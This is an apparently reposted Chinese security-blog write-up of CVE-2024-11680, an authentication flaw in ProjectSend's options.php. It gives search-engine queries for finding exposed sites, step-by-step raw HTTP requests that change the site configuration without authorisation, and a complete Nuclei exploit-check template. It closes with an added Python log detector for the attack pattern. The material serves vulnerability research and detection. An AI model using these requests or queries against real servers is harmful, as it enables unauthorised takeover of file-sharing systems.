CVE-2024-11680

admin | 2024-12-03 12:37:32 | 28 views | 3789 characters | 12 min 37 s read

Disclaimer

Do not use the techniques described in this article for illegal testing. Any direct or indirect consequences or losses caused by spreading or using the information or tools provided in this article are the sole responsibility of the user; the author accepts no legal or joint liability.
[ Vulnerability Overview ]
——  Life is long, with sunshine and rain alike, but with love in your heart, even barren years cannot stop you from running to the mountains and seas and quietly waiting for a tree to bloom (from People's Daily) ——


ProjectSend versions before r1720 are affected by an improper authentication vulnerability. A remote, unauthenticated attacker can exploit the flaw by sending crafted HTTP requests to options.php, which lets them modify the application's configuration without authorization. Successful exploitation allows the attacker to create accounts, upload webshells, and embed malicious JavaScript.


Vulnerability Information

混子Hacker    

01

Asset Discovery

fofa: body="ProjectSend"
Quake: body:"ProjectSend"


02

Vulnerability Reproduction

1. Visit the site to obtain the csrf_token and the session cookie, and note the current title value.

GET / HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Connection: close
Accept-Encoding: gzip
2. Send the cookie and the token to options.php and change the title value. A 500 response indicates the vulnerability is probably present.

POST /options.php HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Connection: close
Content-Length: 138
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=pi3heftu6i4nrtanqiu48pilq8
Accept-Encoding: gzip

csrf_token=e67e90b664ad493abf37c4c770f6d7676453a7275bc21fd0505dac05aa5fa428&section=general&this_install_title=2pei9Dunmem7Jdkj6PbVXS13glW
3. Visit the home page to check whether the change took effect: the value after "Log in »" in the page title has been replaced with the value we set.

GET / HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Connection: close
Cookie: PHPSESSID=pi3heftu6i4nrtanqiu48pilq8
Accept-Encoding: gzip
4. After the change, remember to POST to options.php again to restore the original value so that the site's normal operation is not affected. Visiting the home page then shows the title has been restored.

POST /options.php HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Connection: close
Content-Length: 138
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=pi3heftu6i4nrtanqiu48pilq8
Accept-Encoding: gzip

csrf_token=e67e90b664ad493abf37c4c770f6d7676453a7275bc21fd0505dac05aa5fa428&section=general&this_install_title=2peHaMAlgDO7f4j4cx0MtyyqdxO


03

Nuclei PoC

id: projectsend-auth-bypass

info:
  name: ProjectSend <= r1605 - Improper Authorization
  author: DhiyaneshDK
  severity: high
  description: |
    An improper authorization check was identified within ProjectSend version r1605 that allows an attacker to perform sensitive actions such as enabling user registration and auto validation, or adding new entries in the whitelist of allowed extensions for uploaded files. Ultimately, this allows to execute arbitrary PHP code on the server hosting the application.
  reference:
    - https://www.projectsend.org/
    - https://www.synacktiv.com/sites/default/files/2024-07/synacktiv-projectsend-multiple-vulnerabilities.pdf
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="ProjectSend"
    shodan-query: html:"ProjectSend"
  tags: misconfig,projectsend,auth-bypass,intrusive

variables:
  string: "{{randstr}}"

flow: http(1) && http(2) && http(3) && http(4) && http(5)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "projectsend")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: csrf
        group: 1
        regex:
          - 'name="csrf_token" value="([0-9a-z]+)"'
        internal: true

      - type: regex
        name: title
        group: 1
        regex:
          - '<title>Log in &raquo; ([0-9a-zA-Z]+)</title>'
        internal: true

  - raw:
      - |
        POST /options.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        csrf_token={{csrf}}&section=general&this_install_title={{string}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 500'
          - 'contains(content_type, "text/html")'
        condition: and
        internal: true

  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "{{string}}")'
        condition: and
        internal: true

  - raw:
      - |
        POST /options.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        csrf_token={{csrf}}&section=general&this_install_title={{title}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 500'
          - 'contains(content_type, "text/html")'
        condition: and
        internal: true

  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "{{title}}")'
        condition: and

# If the PoC fails to run, try downloading a newer version of nuclei
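The reproduction steps and the Nuclei template above leave a recognisable trace in the web server's access log: a GET / to harvest the csrf_token, then a POST to /options.php with no Referer that the vulnerable code answers with HTTP 500. The following detector is an added example written for this page; it is not code from the original post, from ProjectSend, or from the Nuclei project. It parses combined-format access-log lines (the sample lines are constructed), groups requests by client, and flags settings writes that match that pattern. The heuristics (missing Referer, 500 status, preceding GET / within a window) are assumptions derived from the write-up, not from ProjectSend's source.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample access-log lines (combined format), not taken from the page.
# Client 203.0.113.7 mimics the PoC request sequence; 198.51.100.20 mimics an
# admin saving settings through the UI (same-site Referer, redirect on success).
SAMPLE_LOG = """\
203.0.113.7 - - [03/Dec/2024:12:30:01 +0800] "GET / HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [03/Dec/2024:12:30:02 +0800] "POST /options.php HTTP/1.1" 500 0 "-" "Mozilla/5.0"
203.0.113.7 - - [03/Dec/2024:12:30:03 +0800] "GET / HTTP/1.1" 200 5140 "-" "Mozilla/5.0"
203.0.113.7 - - [03/Dec/2024:12:30:04 +0800] "POST /options.php HTTP/1.1" 500 0 "-" "Mozilla/5.0"
198.51.100.20 - - [03/Dec/2024:12:31:00 +0800] "GET /options.php HTTP/1.1" 200 8810 "https://files.example/dashboard.php" "Mozilla/5.0"
198.51.100.20 - - [03/Dec/2024:12:31:30 +0800] "POST /options.php HTTP/1.1" 302 0 "https://files.example/options.php" "Mozilla/5.0"
"""

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["path"] = rec["path"].split("?", 1)[0]  # drop query string
    return rec


def find_suspicious_option_writes(log_text, window=timedelta(minutes=5)):
    """Flag POST /options.php requests that look like unauthenticated writes.

    Heuristics (assumptions based on the request sequence in the write-up):
      * a legitimate admin reaches options.php through the app UI, so the POST
        carries a same-site Referer; the PoC sends none;
      * the vulnerable code path answers the PoC with HTTP 500;
      * the PoC is preceded by a GET / from the same client to harvest the token.
    A request is reported when at least two heuristics fire.
    Returns a list of (ip, iso_timestamp, reasons).
    """
    records = [r for r in (parse_line(ln) for ln in log_text.splitlines()) if r]
    by_ip = defaultdict(list)
    for r in records:
        by_ip[r["ip"]].append(r)

    findings = []
    for ip, recs in by_ip.items():
        for r in recs:
            if r["method"] != "POST" or r["path"] != "/options.php":
                continue
            reasons = []
            if r["referer"] in ("", "-"):
                reasons.append("no Referer on settings write")
            if r["status"] == 500:
                reasons.append("HTTP 500 on options.php POST")
            if any(p["method"] == "GET" and p["path"] == "/"
                   and timedelta(0) <= r["ts"] - p["ts"] <= window
                   for p in recs):
                reasons.append("preceded by GET / (token harvest)")
            if len(reasons) >= 2:
                findings.append((ip, r["ts"].isoformat(), reasons))
    return findings


if __name__ == "__main__":
    for ip, ts, reasons in find_suspicious_option_writes(SAMPLE_LOG):
        print(f"{ts} {ip}: " + "; ".join(reasons))
```

On the constructed sample the two PoC-style POSTs from 203.0.113.7 are reported and the admin's UI save is not. The Referer check is the weakest of the three signals (browsers and proxies may strip it), which is why a single heuristic is not enough to raise a finding; in production the POST /options.php path is worth alerting on from any client that has no authenticated session in the application's own logs.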

<<<  END >>>

Original article | Please include a link to the original source when reposting

More vulnerabilities | Follow the author to see more

Author | 混子Hacker

Originally published on the WeChat official account (混子Hacker): [Vulnerability Reproduction] CVE-2024-11680

Disclaimer: The programs (methods) discussed in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; this site accepts no legal or joint liability. For any issues, contact us by e-mail (preferably from a corporate or otherwise valid mailbox so the message is not blocked; contact details are on the home page).
  • Please keep this link when reposting (CN-SEC 中文网, with thanks to the original author for their work):
    CVE-2024-11680 https://cn-sec.com/archives/3461526.html